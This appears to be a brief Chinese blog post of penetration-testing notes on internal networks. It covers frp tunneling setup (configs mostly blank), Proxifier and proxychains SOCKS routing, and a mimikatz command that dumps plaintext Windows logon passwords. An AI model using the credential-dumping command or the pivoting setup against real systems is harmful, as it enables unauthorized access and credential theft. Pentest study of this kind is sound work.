内网渗透笔记
内网渗透总结
代理方法
frp
frp工作原理拓扑图
配置
在使用frp之前,首先要对服务端和客户端配置文件(frps.ini & frpc.ini)进行配置
服务端(有公网的机器):frps.ini
1 | [common] |
1 | 服务端启动:./frps -c frps.ini |
客户端(目标机):frpc.ini
1 | [common] |
1 | 客户端启动:./frpc -c frpc.ini & |
连接代理
Proxifier
Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。
配置
配置文件 => 代理服务器
选中默认的代理服务器配置
填写建立的socks代理配置
检测连接成功后,右键通过Proxifier代理打开即可
Proxychains
一款命令行代理神器,kali3以上默认自带。
ps:proxychains不支持UDP和ICMP
配置
修改配置文件,文件位置为 /etc/proxychains.conf
用vi修改,找到 [ProxyList]
修改内容为:
1 | [ProxyList] |
使用
1 | proxyresolv 127.0.0.1 # 检测连接 |
口令破解
mimikatz
无需tty读取明文密码
1 | mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Y5neKO's Blog!
评论